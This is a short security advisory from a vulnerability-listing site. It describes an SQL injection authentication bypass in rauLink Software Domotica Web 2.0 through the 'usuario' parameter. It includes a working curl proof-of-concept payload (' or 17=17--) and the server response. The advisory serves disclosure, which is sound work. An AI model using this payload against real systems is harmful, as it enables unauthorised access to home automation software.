rauLink Software Domotica Web 2.0 SQL Injection

2020.07.07
Credit: LiquidWorm
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

rauLink Software Domotica Web 2.0 SQL Injection Authentication Bypass Vendor: rauLink Software (raulsoria) Product web page: N/A Affected version: 2.0 Summary: Smart home automation software. Desc: The application suffers from an SQL Injection vulnerability. Input passed through 'usuario' POST parameter in registraUsuario is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism. Tested on: Apache/2.4.6 (Ubuntu) PHP/5.5.3-1ubuntu2.6 phpPgAdmin/5.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2020-5572 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5572.php 10.03.2020 -- $ curl http://192.168.1.75/registro/registraUsuario -X POST -d"usuario=' or 17=17--&password=zsl" HTTP/1.1 200 OK Date: Wed, 28 May 2008 00:06:54 GMT Server: Apache/2.4.6 (Ubuntu) X-Powered-By: PHP/5.5.3-1ubuntu2.6 Set-Cookie: PHPSESSID=gl8tbui3skca9d74m5pg7l6q96; path=/ Expires: Thu, 10 Dec 1983 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 0 Content-Type: text/html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top